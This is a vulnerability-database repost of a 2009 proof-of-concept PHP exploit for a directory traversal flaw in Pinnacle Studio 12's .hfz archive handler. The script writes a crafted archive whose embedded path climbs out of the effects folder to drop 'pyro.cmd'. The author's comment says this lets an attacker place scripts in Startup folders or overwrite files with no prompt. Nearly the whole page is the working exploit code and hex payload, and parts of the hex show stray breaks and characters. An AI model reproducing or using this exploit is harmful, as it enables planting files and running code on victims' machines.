Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21823
HistoryMay 13, 2009 - 12:00 a.m.

Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal vulnerability poc

2009-05-1300:00:00
vulners.com
18

<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis

Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/
 
Some keys exported from the registry:
 
[HKEY_CLASSES_ROOT&#92;.hfz]
@=&quot;hfzfile&quot;
 
[HKEY_CLASSES_ROOT&#92;.hfz&#92;hfzfile]
 
[HKEY_CLASSES_ROOT&#92;.hfz&#92;hfzfile&#92;ShellNew]
 
[HKEY_CLASSES_ROOT&#92;hfzfile]
@=&quot;Hollywood FX Compressed Archive&quot;
 
[HKEY_CLASSES_ROOT&#92;hfzfile&#92;DefaultIcon]

@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"

[HKEY_CLASSES_ROOT&#92;hfzfile&#92;shell]
 
[HKEY_CLASSES_ROOT&#92;hfzfile&#92;shell&#92;Open]
 
[HKEY_CLASSES_ROOT&#92;hfzfile&#92;shell&#92;Open&#92;command]
@=&quot;&#92;&quot;C:&#92;&#92;Documents and Settings&#92;&#92;All

Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00

Usually files are decompressed in a Pinnacle effects folder...
Problem is ... that .hfz files can be used to overwrite files on the target system
or placing scripts in Startup folders by directory traversal attacks
and InstallHFX.exe decompresses them with no prompts!
Just modified an existing .hfz file and here it is the dump ...
Also I experienced some crashes in doing this... investigating...
 
*/
 
$____path = &quot;..&#92;&#92;..&#92;&#92;..&#92;&#92;..&#92;&#92;..&#92;&#92;..&#92;&#92;..&#92;&#92;..&#92;&#92;pyro.cmd&quot;;
 
$____payload = &quot;&#92;x48&#92;x46&#92;x58&#92;x5a&#92;x48&#92;x46&#92;x58&#92;x5a&#92;x9c&#92;x07&#92;x00&#92;x00&#92;x49&#92;x00&#92;x00&#92;x00&quot;.

"\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a".
"\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b".
"\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04".
"\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb".
"\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2".
"\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51".
"\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2".
"\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5".
"\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99".
"\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93".
"\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0".
"\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3".
"\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd
6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27".
"\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4".
"\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c".
"\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc".
"\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9".
"\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19".
"\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5".
"\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09".
"\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80".
"\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26".
"\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a".
"\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e".
"\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97".
"\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b".
"\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1
\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44!
\x01\xe7
\x86\x0d\x33\xe4\x29\x56\xf7\x01".
"\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3".
"\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b".
"\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48".
"\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32".
"\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef".
"\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91".
"\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90".
"\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08".
"\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65".
"\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf".
"\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c".
"\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac".
"\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78".
"\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x
82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c".
"\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f".
"\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e".
"\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0".
"\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60".
"\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9".
"\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3".
"\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e".
"\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82".
"\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8".
"\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e".
"\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3".
"\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34".
"\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59".
"\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe
5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x0!
4\x1b\x8
8\x3e\x89\x00\x3c\x5a\xff". "\xd5\x65\xc7\xe1\x0f\x8a\x9d\x1f\x97\xb8\xb0\xb4\xc9\x74\xe1\xd2".
"\xa5\x4b\x1c\xa4\x88\xb0\x70\xbb\xe9\xdd\xa2\xa2\xef\x2a\x2b\xef".
"\x6d\xd9\xc2\x1e\xed\xf8\x0c\x87\xfe\xb5\x82\xd0\xc3\x60\xd8\x0e".
"\x48\x36\x6d\x62\x7b\xba\xba\x44\x86\x61\x39\x7c\x36\x69\x34\x9a".
"\xba\xba\xfa\x77\x68\x27\xf0\x64\x64\x7c\x8e\x1e\x0e\x0f\xda\xb5".
"\xba\x01\x9a\xbe\x68\xb3\x3d\x82\x4e\x37\x9f\xf7\x17\xf3\xd1\x84".
"\x97\xb2\xf3\x92\x15\xd9\x4f\x39\x99\x98\x98\x20\xeb\xe2\xdc\x65".
"\x50\x26\xef\xd1\x37\x64\x19\x3e\x8b\x8a\x8a\xe2\xe3\xc9\x32\x9c".
"\xac\xa8\xb8\xd3\xde\xce\x8e\x87\x1b\x00\x0c\xf4\x2c\x06\x12\x72".
"\x14\xdc\x1b\x2c\x35\x34\x30\x4d\x4d\x9e\xc3\x06\x61\x9b\x4f\x85".
"\xcb\xe5\x22\x5f\x99\xfc\xcd\xe2\x99\xb0\x88\x92\x92\x5f\x0a\x0a".
"\xfe\xc4\x78\xf8\x21\x08\x07\x4b\x7d\x7d\x8c\xc3\xc1\x48\x7f\xbc".
"\x04\x75\x72\xac\x0e\xdf\x6e\x6b\x63\x4d\x09\x23\x92\xd0\x4b\x4d".
"\x3d\x74\x3b\x70\x01\xc2\xda\x9c\x63\x55\x55\x8f\x89\x12\x4c\x21". "\xd2\xd8\
xc8\x12\x0e\x9d\x38\x4d\xc9\x66\x69\xdb\x36\x76\x5b\x81".
"\x12\xe0\x21\xa9\x60\x70\x90\xed\x17\x10\xc2\x95\xc9\xc9\x49\xda".
"\xf0\x49\x75\xb5\x30\x10\xb8\x2f\x17\x38\x52\x6f\xaf\xd4\xf7\x54".
"\x50\x41\x74\xec\xde\xed\xc9\x4b\x50\x88\x36\x10\xe2\xd8\x1f\x1d".
"\x9d\x0e\x2a\x38\x24\x37\x6f\xde\x8c\x8c\x8c\xb4\x5a\x67\x02\xe9".
"\x01\x12\x58\x1f\xc1\x8b\xb7\x83\x06\xec\x5c\x65\x65\x77\x65\x13".
"\x05\xc1\x7b\xd9\xdd\x99\x13\x0a\xe1\x51\xa4\x93\xa6\xcf\x47\x46".
"\xc6\x28\x95\x85\x36\x5b\x90\x0f\x6d\xbb\x7b\x0b\x20\xfe\x83\x78".
"\x21\x9c\xcb\x76\x27\xbb\x3b\x3b\xe1\x8a\xbd\x0f\x07\x57\x34\x48".
"\x42\x58\x28\xed\xb0\x54\x67\x27\x1b\x14\x08\x3d\x72\xe0\x44\xbc".
"\xc8\x86\x04\x72\x48\x03\x84\x93\x2c\x07\xce\x83\x6e\x79\xfe\x82".
"\xb4\x06\xae\xc8\xdb\xe5\xe6\xde\xe1\x82\xd7\x5f\x42\x4c\x11\xe4".
"\x68\x07\x6f\x87\xc8\xce\x2a\x5c\xc0\xf6\xf7\x33\x24\x53\xc9\x16".
"\xd0\x02\x25\x7b\xf6\x2c\x4a\x89\xc9\x74\x0b\x2e\x84\x24\x40\x72".
"\xf8\xe2\x45\xde\x09\x53\x20\x41\x7f\x71\xfa\x
ff\x85\x6f\x71\x4b". "\x85\x4d\x67\x45\x7a\x9b\x0a\x9f\xff\x!
75\x91\x
2b\x0a\x4f\x25\x17". "\xae\xc1\xfe\xf0\x48\xb3\x8d\x70\xfe\x14\x3c\x8a\xe1\xcd\x3d\x92".
"\x5f\x5e\xad\x9d\x43\x63\xfc\x39\xaf\x66\x93\x8a\xb4\xc2\xa9\x08".
"\xd1\x5f\x36\x97\x84\xf4\xab\xe7\xd5\xb1\xd2\x1c\xe1\xbc\x0b\x63".
"\xa5\xc6\xd6\x96\xf8\x11\x8a\x1a\x1d\xf1\x7d\x46\x1b\xbd\xf5\xea".
"\xd8\x98\xcf\x3c\x05\x59\x6f\x54\xaf\xff\x06\x73\xe8\x51\xc1\x82".
"\xc6\xf9\xea\xc3\x49\xe8\xf3\xbc\x04\x5c\xe3\x08\x30\x87\x42\x00".
"\x1d\x4c\xf1\x47\x47\x96\x89\x01\x0a\x3a\x0f\xc4\x19\x7d\x1f\x2d".
"\xa1\xd2\x22\xed\x23\x85\xbf\x66\x4a\x12\x27\x24\x20\x54\x43\x51".
"\x65\xf9\x79\x5a\xd6\xb7\x8e\xbd\x38\xff\x88\xa2\x5e\x40\x2d\x72".
"\xf6\xf6\xa9\xab\xdb\x9b\x9a\x9d\x6a\xbd\xf0\x3e\x82\xe2\x8f\x16".
"\x96\x97\xd6\xe2\x72\xc4\xab\xf9\xb8\x94\x66\xad\xf0\x7e\x21\x9a".
"\x4f\x48\x69\xd6\x09\xef\x43\xd1\x5c\x69\x2d\xd0\x9e\x44\xe3\xed".
"\x68\xfe\x58\xf7\x7f\x0c\x1c\x8d\x3b\x9a\x7a\x9c\xdd\x6a\x3d\x45".
"\x0d\x19\xe7\xab\xb8\x36\x91\xa2\xa0\xc2\x28\x12\x93\x34\xed\x3f". "\xcd\x4b\xbf\x58
\xe1\x59\xab\xc9\x8b\x14\x25\xcc\x7d\x65\x11\x0f".
"\xe3\xef\x01\x1f\xc4\xac\x37\x7b\x08\x15\x81\xcb\xd5\xf3\x5d\xd4".
"\x20\xfa\xcc\x22\x60\xa5\xe1\x1e\x0f\x09\x2e\xfb\x3f\x95\x68\x4f".
"\x65\xdb\x2f\xcf\xc3\x3d\x18\x00\xae\x4e\x16\xbb\xc1\xe0\x9e\x90".
"\x0b\x37\xd7\x54\xa6\xeb\x45\xb3\xfb\x55\x3e\x5c\xf6\x61\x99\xa3".
"\xbd\x4b\x9d\xeb\xe8\x6c\xee\x71\xf8\x68\xa3\x03\x69\xbf\xd2\x13".
"\x6b\x46\x7a\x7b\x9d\xa2\xb6\x99\xac\xdf\x1e\xcd\xf1\x56\xf6\x99".
"\xe2\xbd\xf7\xa3\x15\x0a\xde\x34\xd7\xf5\xf5\x16\x73\x89\xf6\x53".
"\x34\x69\x15\x7f\xe9\x67\x29\xe2\x8a\x6a\xfd\x3a\xb4\xf6\x76\xf7".
"\x38\x9b\xba\x1d\x7d\x6d\xfb\x32\x2d\x0d\xdb\x9b\x1b\xfb\x7a\x33".
"\xd3\xd2\xd4\xc9\xea\x5c\x67\x67\xa7\xb3\x2b\x93\x0c\x4c\x69\x6b".
"\x71\x0a\x40\x8d\x0a\x38\xa0\x79\x55\xbc\x28\xdc\x21\x21\xdc\x3e".
"\x10\x84\x5e\x98\x26\x3f\x98\x05\x1d\x8e\x3e\xb5\x36\x04\x98\x64".
"\xa0\x17\x66\x65\xd6\x8d\x9c\x75\x75\xc6\x91\xef\xef\xfe\xe4\x93".
"\xed\x96\x7e\x99\x6e\xf4\x56\x0f\x24\x31\x98\x07\xa4\
x61\x9a\xc5". "\x61\xea\x42\x85\xa9\xe3\xb1\x19\x34\x99\x4b\!
xc0\x3c\
x28\x0e\xf3". "\x5f\x77\x19\xc2\x8e\x00\x00\x48\x46\x58\x5a\x28\x00\x00\x00\x44".
"\x00\x00\x00\x00\x11\x00\x00\x00\x7e\x6f\x72\x67\x73\x3a\x65\x66".
"\x66\x65\x63\x74\x73\x2e\x6f\x72\x67\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x34\x00\x00";

$_f = fopen&#40;&quot;puf.hfz&quot;, &quot;w+&quot;&#41;;
 
fputs&#40;$_f, $____payload&#41;;
 
fclose&#40;$_f&#41;;

?>

original url: http://retrogod.altervista.org/9sg_pinnacle_studio_12_hfz.htm